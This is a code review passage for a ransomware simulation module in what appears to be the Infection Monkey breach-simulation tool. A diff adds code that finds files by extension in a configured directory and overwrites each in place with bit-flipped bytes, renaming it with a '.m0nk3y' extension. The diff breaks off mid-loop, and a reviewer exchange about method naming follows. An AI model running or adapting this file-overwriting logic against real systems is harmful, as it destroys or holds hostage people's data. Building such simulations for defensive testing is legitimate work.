monkey/infection_monkey/ransomware/ransomware_payload.py

```diff
@@ -1,27 +1,64 @@
 import logging
+from pathlib import Path
+
+from infection_monkey.ransomware.valid_file_extensions import VALID_FILE_EXTENSIONS_FOR_ENCRYPTION
+from infection_monkey.utils import bit_manipulators
+from infection_monkey.utils.dir_utils import (
+    file_extension_filter,
+    filter_files,
+    get_all_regular_files_in_directory,
+    is_not_shortcut_filter,
+    is_not_symlink_filter,
+)
+from infection_monkey.utils.environment import is_windows_os
 
 LOG = logging.getLogger(__name__)
 
+CHUNK_SIZE = 64
+EXTENSION = ".m0nk3y"
+
 
 class RansomewarePayload:
     def __init__(self, config: dict):
-        self.config = config
+        LOG.info(f"Windows dir configured for encryption is " f"{config['windows_dir']}")
+        LOG.info(f"Linux dir configured for encryption is " f"{config['linux_dir']}")
 
-    def run_payload(self):
-        LOG.info(
-            f"Windows dir configured for encryption is " f"{self.config['windows_dir_ransom']}"
-        )
-        LOG.info(f"Linux dir configured for encryption is " f"{self.config['linux_dir_ransom']}")
+        self._target_dir = Path(config["windows_dir"] if is_windows_os() else config["linux_dir"])
+        self._valid_file_extensions_for_encryption = VALID_FILE_EXTENSIONS_FOR_ENCRYPTION.copy()
+        self._valid_file_extensions_for_encryption.discard(EXTENSION)
 
+    def run_payload(self):
         file_list = self._find_files()
         self._encrypt_files(file_list)
 
     def _find_files(self):
-        return []
+        file_filters = [
+            file_extension_filter(self._valid_file_extensions_for_encryption),
+            is_not_shortcut_filter,
+            is_not_symlink_filter,
+        ]
+
+        all_files = get_all_regular_files_in_directory(self._target_dir)
+        return filter_files(all_files, file_filters)
 
     def _encrypt_files(self, file_list):
-        for file in file_list:
-            self._encrypt_file(file)
+        for filepath in file_list:
+            self._encrypt_file(filepath)
+            self._add_extension(filepath)
+
+    def _encrypt_file(self, filepath):
+        with open(filepath, "rb+") as f:
+            data = f.read(CHUNK_SIZE)
+            while data:
+                num_bytes_read = len(data)
+
+                encrypted_data = bit_manipulators.flip_bits(data)
+
+                f.seek(-num_bytes_read, 1)
+                f.write(encrypted_data)
```

Comment:
Could this be moved into a method with an explanatory name? Like `overwrite_bytes_in_file` or something?

Reply:
If you think it's still necessary. It now lives inside `_encrypt_single_file_in_place()`. The "in_place" portion of the name better indicates what's going on. IMHO, this function is short and focused enough that with the new name, I think it's clear what's going in. But I can still change it if you feel strongly about it.